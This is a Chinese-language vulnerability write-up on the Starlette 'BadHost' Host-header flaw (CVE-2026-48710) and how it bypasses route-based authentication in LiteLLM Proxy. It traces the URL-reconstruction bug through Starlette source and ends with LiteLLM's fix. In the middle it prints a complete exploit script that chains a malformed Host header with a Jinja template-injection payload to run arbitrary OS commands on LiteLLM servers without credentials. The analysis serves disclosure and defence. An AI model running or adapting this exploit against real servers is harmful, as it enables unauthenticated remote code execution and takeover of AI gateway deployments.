CVE-2026-48710: Starlette BadHost

背景

今年 5 月 OSTIF 披露了一个 Starlette 的漏洞,命名为 “BadHost”,漏洞编号 CVE-2026-48710。

真正值得关注的点并不只是 Starlette 本身。Starlette 作为 Python ASGI 生态里的底座之一被许多上层应用依赖,一个典型的例子是 FastAPI,它依赖 Starlette 实现了完整的请求解析、路由分发和中间件机制。这意味着只要上层框架或产品依赖了受影响版本的 Starlette就有可能产生权限绕过的问题。

这条传播链在 AI 基础设施里变的尤为明显,过去两年很多 LLM 服务都选择使用 Starlette 构建,常见如 LiteLLM、vLLM、FastMCP 等流行的 AI 基础设施均受此漏洞影响。

漏洞原理

BadHost 漏洞的触发条件可以分为三个组成部分:

  1. 底层框架(Starlette)使用 Host 头重建 URL
  2. URL 重建结果和 ASGI scope 中的 path 存在差异
  3. 下游代码信任 request.url.path 并用其做权限校验

BaseHTTPMiddleware 拿到 request 后转换为 _CachedRequest 并调用 dispatch_func 继续执行。

/starlette/middleware/base.py
class BaseHTTPMiddleware:
def __init__(self, app: ASGIApp, dispatch: DispatchFunction | None = None) -> None:
self.app = app
self.dispatch_func = self.dispatch if dispatch is None else dispatch
async def __call__(self, scope: Scope, receive: Receive, send: Send) -> None:
if scope["type"] != "http":
await self.app(scope, receive, send)
return
request = _CachedRequest(scope, receive)
...
response = await self.dispatch_func(request, call_next)

后续在鉴权中间件获取到的 Request 即为 _CachedRequestrequest.url 作为属性懒加载:

/starlette/datastructures.py
@property
def url(self) -> URL:
if not hasattr(self, "_url"): # pragma: no branch
self._url = URL(scope=self.scope)
return self._url

URL 初始化时通过 scope 获取真实 path 并从 headers 中解析 Host 头拼接作为完整的 URL。

/starlette/datastructures.py
class URL:
def __init__(
self,
url: str = "",
scope: Scope | None = None,
**components: Any,
) -> None:
if scope is not None:
assert not url, 'Cannot set both "url" and "scope".'
assert not components, 'Cannot set both "scope" and "**components".'
scheme = scope.get("scheme", "http")
server = scope.get("server", None)
path = scope["path"]
query_string = scope.get("query_string", b"")
host_header = None
for key, value in scope["headers"]:
if key == b"host":
host_header = value.decode("latin-1")
break
if host_header is not None:
url = f"{scheme}://{host_header}{path}"
elif server is None:
url = path
else:
host, port = server
default_port = {"http": 80, "https": 443, "ws": 80, "wss": 443}[scheme]
if port == default_port:
url = f"{scheme}://{host}{path}"
else:
url = f"{scheme}://{host}:{port}{path}"
if query_string:
url += "?" + query_string.decode()
elif components:
assert not url, 'Cannot set both "url" and "**components".'
url = URL("").replace(**components).components.geturl()
self._url = url

这里没有校验 Host 头是否符合 RFC 规范就直接拼接了,而后续的 request.url.* 的一系列字段方法均依赖于 self.components 字段。

/starlette/datastructures.py
@property
def scheme(self) -> str:
return self.components.scheme
@property
def netloc(self) -> str:
return self.components.netloc
@property
def path(self) -> str:
return self.components.path
@property
def query(self) -> str:
return self.components.query

self.components 是通过 urlsplit 重新解析后的 URL 对象。

/starlette/datastructures.py
@property
def components(self) -> SplitResult:
if not hasattr(self, "_components"):
self._components = urlsplit(self._url)
return self._components

意味着攻击者将 Host 设置为 x/?,那么最终的 self._url 就会被拼接为:

<schema>://x/?<path>

与此同时,路由分发使用的路径并不是 request.url.path 而是未被污染的 scope["path"]

/starlette/routing.py
def matches(self, scope: Scope) -> tuple[Match, Scope]:
path_params: dict[str, Any]
if scope["type"] == "http":
route_path = get_route_path(scope)
match = self.path_regex.match(route_path)
if match:
matched_params = match.groupdict()
for key, value in matched_params.items():
matched_params[key] = self.param_convertors[key].convert(value)
path_params = dict(scope.get("path_params", {}))
path_params.update(matched_params)
child_scope = {"endpoint": self.endpoint, "path_params": path_params}
if self.methods and scope["method"] not in self.methods:
return Match.PARTIAL, child_scope
else:
return Match.FULL, child_scope
return Match.NONE, {}
def get_route_path(scope: Scope) -> str:
path: str = scope["path"]
root_path = scope.get("root_path", "")
if not root_path:
return path
if not path.startswith(root_path):
return path
if path == root_path:
return ""
if path[len(root_path)] == "/":
return path[len(root_path) :]
return path

此时后端获取到的 request.url.path/,但 scope 里的又是真实的 <path>,由此产生差异。

一个存在漏洞的鉴权中间件示例:

auth_middleware.py
from starlette.middleware.base import BaseHTTPMiddleware
from starlette.responses import JSONResponse
class VulnerableAuthMiddleware(BaseHTTPMiddleware):
async def dispatch(self, request, call_next):
path = request.url.path # 这里获取到的是 `/`
if path.startswith("/admin"): # 绕过权限校验
token = request.headers.get("authorization")
if token != "Bearer secret-token":
return JSONResponse(
{"detail": "Unauthorized"},
status_code=401,
)
# 直接调用后续真实业务逻辑代码!
return await call_next(request)

真实世界的案例:LiteLLM

LiteLLM Proxy 是一个典型的 AI Gateway。它用 FastAPI 暴露 OpenAI 系列 API,同时在请求入口做 virtual key、用户角色、allowed routes、预算、模型权限等检查。

在受影响版本中,LiteLLM 的鉴权逻辑不是直接使用 ASGI scope["path"],而是封装了一个 get_request_route() 辅助函数。以 v1.83.14-stable 为例,这个函数的核心逻辑是:

def get_request_route(request: Request) -> str:
try:
if hasattr(request, "base_url") and request.url.path.startswith(
request.base_url.path
):
return request.url.path[len(request.base_url.path) - 1 :]
else:
return request.url.path
except Exception:
return request.url.path

也就是说,LiteLLM 的中心鉴权链路依赖的是 request.url.path,这会直接影响 LiteLLM 的 route-based 鉴权逻辑。在 user_api_key_auth 中,LiteLLM 会先计算:

route: str = get_request_route(request=request)

随后用这个 route 判断是否为 public route:

if (
route in LiteLLMRoutes.public_routes.value
or route_in_additonal_public_routes(current_route=route)
):
return UserAPIKeyAuth(user_role=LitellmUserRoles.INTERNAL_USER_VIEW_ONLY)

/ 正好在 LiteLLM 的 public_routes 中,于是攻击链变成:

  1. 攻击者请求后台接口如 /prompts/test
  2. 通过畸形 Host 让 request.url.path 被解析成 /
  3. LiteLLM 鉴权层实现认为请求的是公共路由于是把请求交给后续 Handler

结合 BadHost 权限绕过与之前披露的后台 SINK实现未授权远程代码执行。

exploit_badhost.py
import argparse
import json
import socket
import ssl
import sys
from base64 import b64decode
from typing import Optional, Tuple
from urllib.parse import urlparse
class Logger:
COLORS = {'DEBUG': '\033[36m', 'INFO': '\033[32m', 'ERROR': '\033[31m', 'FATAL': '\033[35m'}
def __init__(self, verbose=False):
self.verbose = verbose
def _log(self, level, msg):
print(f"{self.COLORS.get(level, '')}[{level.lower()}]\033[0m {msg}")
def debug(self, msg):
if self.verbose:
self._log('DEBUG', msg)
def info(self, msg):
self._log('INFO', msg)
def error(self, msg):
self._log('ERROR', msg)
def fatal(self, msg):
self._log('FATAL', msg)
sys.exit(1)
class LiteLLMBadHostExploit:
BADHOST = "x/?"
def __init__(self, target, command, proxy=None, verbose=False):
self.target = target.rstrip('/')
self.command = command
self.logger = Logger(verbose=verbose)
parsed = urlparse(self.target)
self.host = parsed.hostname
self.port = parsed.port or (443 if parsed.scheme == 'https' else 80)
self.use_tls = parsed.scheme == 'https'
self.proxy = urlparse(proxy) if proxy else None
def run(self):
self.logger.info(f"Target: {self.target}")
self.logger.info(f"Command: {self.command}")
result = self._execute_command(self.command)
if result is None:
self.logger.fatal("Command execution failed")
self.logger.info("Output:")
print('\t' + result.replace('\n', '\n\t'))
def _execute_command(self, command: str) -> Optional[str]:
payload = (
"---\nmodel: gpt-4o\n---\n\nUser: "
"{% for c in ().__class__.__bases__[0].__subclasses__() %}"
"{% if c.__name__ == \"catch_warnings\" %}"
"{% set result = c.__init__.__globals__[\"sys\"].modules[\"os\"]"
".popen(\"" + command + "| base64 -w0\").read() %}"
"{{ c.__init__.__globals__[\"__builtins__\"][\"exec\"]("
"\"raise Exception('\" + result + \"')\") }}"
"{% endif %}{% endfor %}"
)
json_body = '{"dotprompt_content": "' + _to_unicode(payload) + '"}'
self.logger.debug(f"Payload size: {len(json_body)} bytes")
status, body = self._raw_request('POST', '/prompts/test', json_body)
self.logger.debug(f"Response: {status}")
if not body:
return None
try:
detail = json.loads(body).get('detail', '')
if not detail:
self.logger.debug(f"Response body: {body[:200]}")
return None
return b64decode(detail.encode()).decode()
except Exception as e:
self.logger.debug(f"Decode error: {e}, raw: {body[:200]}")
return None
def _raw_request(self, method: str, path: str, body: str) -> Tuple[Optional[str], str]:
try:
sock = self._connect()
if self.use_tls:
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
sock = ctx.wrap_socket(sock, server_hostname=self.host)
raw = (
f"{method} {path} HTTP/1.1\r\n"
f"Host: {self.BADHOST}\r\n"
f"Content-Type: application/json\r\n"
f"Content-Length: {len(body.encode())}\r\n"
f"Connection: close\r\n"
f"\r\n"
f"{body}"
)
self.logger.debug(f">>> {method} {path}")
sock.sendall(raw.encode())
response = b''
while True:
try:
chunk = sock.recv(8192)
if not chunk:
break
response += chunk
except socket.timeout:
break
sock.close()
text = response.decode(errors='replace')
status_line = text.split('\r\n')[0] if text else None
body_start = text.find('\r\n\r\n')
resp_body = text[body_start + 4:] if body_start > 0 else ''
return status_line, resp_body
except (socket.error, OSError) as e:
self.logger.error(f"Connection failed: {e}")
return None, ''
def _connect(self) -> socket.socket:
if self.proxy and self.use_tls:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(15)
sock.connect((self.proxy.hostname, self.proxy.port or 8080))
connect = f"CONNECT {self.host}:{self.port} HTTP/1.1\r\nHost: {self.host}:{self.port}\r\n\r\n"
sock.sendall(connect.encode())
resp = sock.recv(4096).decode()
if '200' not in resp:
raise ConnectionError(f"Proxy CONNECT failed: {resp.strip()}")
return sock
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(15)
sock.connect((self.host, self.port))
return sock
def _to_unicode(s: str) -> str:
return ''.join(f'\\u{ord(c):04x}' for c in s)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='LiteLLM BadHost RCE (CVE-2026-48710 + SSTI)',
epilog='Example: python exploit_badhost.py -t http://target:4000 -c "id"'
)
parser.add_argument('-t', '--target', required=True)
parser.add_argument('-c', '--command', required=True)
parser.add_argument('--proxy', default=None)
parser.add_argument('-v', '--verbose', action='store_true')
args = parser.parse_args()
print("\033[31m[*] LiteLLM BadHost RCE \u2014 CVE-2026-48710 + SSTI\033[0m")
print("\033[31m[*] No credentials required\033[0m\n")
LiteLLMBadHostExploit(
target=args.target,
command=args.command,
proxy=args.proxy,
verbose=args.verbose,
).run()

新版本中,LiteLLM 把 get_request_route() 改成优先读取 request.scope["path"],并显式更新了 Starlette 的依赖版本。

/litellm/proxy/auth/auth_utils.py
def get_request_route(request: Request) -> str:
"""
Resolve the request route from the ASGI scope, with ``root_path`` stripped.
Prefer this over ``request.url.path`` for any auth, ACL, routing, or
audit-log decision: Starlette reconstructs ``url.path`` by interpolating
the Host header into a URL string and re-parsing with ``urlsplit``, so a
malformed Host (e.g. ``localhost/?x=1``) collapses ``url.path`` to ``"/"``
while FastAPI continues to dispatch on ``scope["path"]``. ``scope["path"]``
is uvicorn's parse of the HTTP request line and matches the actual
handler, so it's the authoritative route.
Also normalizes sub-path deployments by stripping ``scope["root_path"]``
e.g. ``/genai/chat/completions`` -> ``/chat/completions``.
"""
try:
scope = request.scope
if not isinstance(scope, dict):
return str(request.url.path)
raw_path: str = str(scope.get("path", request.url.path))
root_path: str = str(
scope.get("app_root_path", scope.get("root_path", ""))
).rstrip("/")
if not isinstance(raw_path, str):
return str(request.url.path)
# Strip root_path only when it matches whole path segments — guarding
# against sibling paths like "/apifoo" being truncated under
# root_path="/api". Trailing slashes on root_path are stripped above,
# so bare "/" or "/prefix/" still leave the leading "/" intact.
if root_path and (
raw_path == root_path or raw_path.startswith(root_path + "/")
):
stripped = raw_path[len(root_path) :]
return stripped or "/"
return raw_path
except Exception as e:
verbose_proxy_logger.debug(
f"error on get_request_route: {str(e)}, defaulting to request.url.path={request.url.path}"
)
return str(request.url.path)

参考链接